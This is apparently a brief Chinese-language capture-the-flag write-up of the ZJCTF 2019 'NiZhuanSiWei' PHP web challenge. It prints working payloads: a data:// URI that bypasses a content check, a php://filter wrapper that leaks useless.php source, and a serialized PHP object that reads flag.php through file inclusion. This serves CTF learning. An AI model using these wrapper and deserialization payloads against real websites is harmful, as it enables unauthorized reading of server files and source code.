[ZJCTF 2019]NiZhuanSiWei
[ZJCTF 2019]NiZhuanSiWei
開啟主介面就是這個亞子
傳入一個檔案檔案內容為 welcome to the zjctf
可以使用php偽協議或者data偽協議
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
繞過了第一層
隨後,下面包含了一個檔案,利用php偽協議檢視一下useless.php的內容
file=php://filter/read=convert.base64-encode/resource=useless.php
輸入以後,出現內容
將內容解碼
隨後將password進行序列化
隨後輸入
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
檢視頁面原始碼發現flag
參考連結:
https://www.cnblogs.com/gaonuoqi/p/12255777.html
相關文章
- NSSCTF WEB nizhuansiweiWeb
- [BJDCTF2020]ZJCTF,不過如此 1TF2
- [BJDCTF2020]ZJCTF,不過如此(php偽協議,data偽協議,preg_replace /e漏洞)TF2PHP協議
- 2019
- Microsoft Excel 2019 for Mac(office excel 2019)ROSExcelMac
- 2019 E
- 憶2019
- 2019 有 MacBook Pro (16-inch, 2019) 嗎?Mac
- PS 2019 | Photoshop CC 2019 的安裝啟用
- 2019/3/6
- 2019/3/8
- 2019總結
- 2019/3/1
- Laracon AU 2019
- 再見,2019
- 2019 MCM Problem A
- 2019/3/13
- 2019/3/5
- [SUCTF 2019]CheckIn
- Outlook 2019 for macMac
- Microsoft Office 2019ROS
- Office 2019 for MacMac
- 2019-東華杯&2019-360ctf__PWN題解
- 如何讓Visual Studio 2019更好用(VS2019配置指南)
- 全新的SharePoint 2019
- 2019-02-24
- 不念2018,不畏2019
- 2019-04-11
- 2019-01-21
- 2019 碎碎念
- 2019-02-27
- gwctf2019 babyvmTF2
- CISCN 2019-ikun
- 2019 OCP簡介
- 2019 Gopher Meetup 杭州Go
- 2019 Gopher meetup 深圳Go
- 2019 Gopher Meetup 北京Go
- 2019 Gopher Meetup 上海Go